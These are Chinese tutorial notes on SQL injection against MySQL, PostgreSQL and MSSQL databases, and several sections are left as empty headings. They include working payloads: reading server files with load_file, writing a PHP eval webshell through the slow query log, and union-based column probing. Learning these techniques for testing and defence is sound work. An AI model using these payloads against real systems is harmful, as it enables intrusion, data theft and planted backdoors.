知识点:
1、SQL注入-MYSQL数据库;
2、SQL注入-MSSQL数据库;
3、SQL注入-PostgreSQL数据库;
首先要找到注入点
详细点:
Access无高权限注入点-只能猜解,还是暴力猜解
MYSQL,PostgreSQL,MSSQL高权限注入点-可升级读写执行等
演示案例:
MYSQL-root高权限读写注入
PostgreSQL-高权限读写注入
MSSQL-sa高权限读写执行注入
结尾菜单-某Q牌违法登录框注入
MYSQL-root高权限读写注入:
select load_file("d:/w.txt'); // mysql读取本地文件
前提是my.ini配置文件中secure_file_priv参数没有配置
也可以使用into outfile把内容写入到本地,如写入木马
在实战中,一般使用load_file读取有价值的文件:如数据库配置文件、apache搭建文件,可百度搜索
路径获取:读取配置文件、报错、phpinfo泄露等,或百度
无法写入:secure_file_priv突破,注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接脸上对方数据库进行绕过
set global slow_query_log=1 // 开启mysql的日志记录
set global slow_query_log_file='shell路径’ // 设置日志记录的功能
select '<?php eval($_GET[A])?>' or SLEEP(11); // 写入一句话后门的代码
PostgreSQL-高权限读写注入
测列数:
order by 4
and 1=2 union select null,null,null,null
测显位:
获取信息:
获取数据库名:
获取表名:
获取列名:
获取数据:
补充-获取dba用户(同样在dba用户下,是可以进行文件读写的)
MSSQL-sa高权限读写执行注入
测列数:
order by 4
and 1=2 union all select null,null,null,null
测显位: